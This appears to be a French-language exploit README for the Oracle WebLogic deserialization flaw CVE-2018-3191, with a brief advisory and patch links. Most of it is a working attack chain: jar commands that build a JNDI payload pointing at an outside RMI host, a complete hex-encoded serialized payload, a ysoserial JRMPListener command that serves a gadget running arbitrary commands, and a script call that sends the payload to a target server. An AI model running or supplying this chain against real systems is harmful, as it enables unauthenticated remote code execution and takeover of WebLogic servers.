
Vulnérabilité d'exécution de code et de commandes à distance Weblogic-CVE-2018-3191

Le 17 octobre, heure de Pékin, la mise à jour critique de correctifs d’octobre (CPU) publiée par Oracle a corrigé une vulnérabilité critique d’exécution de code à distance dans WebLogic (CVE-2018-3191).
Cette vulnérabilité permet à un attaquant non authentifié d’accéder au réseau via le protocole T3 et de compromettre un serveur WebLogic vulnérable. Une exploitation réussie peut entraîner la prise de contrôle du serveur WebLogic par l’attaquant, permettant ainsi une exécution de code à distance.
Lien officiel du CPU Oracle :
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
Correctif officiel :
Oracle a déjà corrigé cette vulnérabilité dans la mise à jour critique de correctifs d’octobre (Critical Patch Update). Il est fortement recommandé aux utilisateurs concernés d’appliquer la mise à niveau dès que possible pour se protéger.
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

`
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt
java -jar weblogic-spring-jndi.jar <jndi_address>
Example:
java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
weblogic-spring-jndi-12.2.1.3.jar for weblogic:
12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar for weblogic:
10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1
`

payload(hex):
aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"
root@374bb3d9a2d8:/tools# ./rmi.sh
* Opening JRMP listener on 6668

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt



https://github.com/voidfyoo/CVE-2018-3191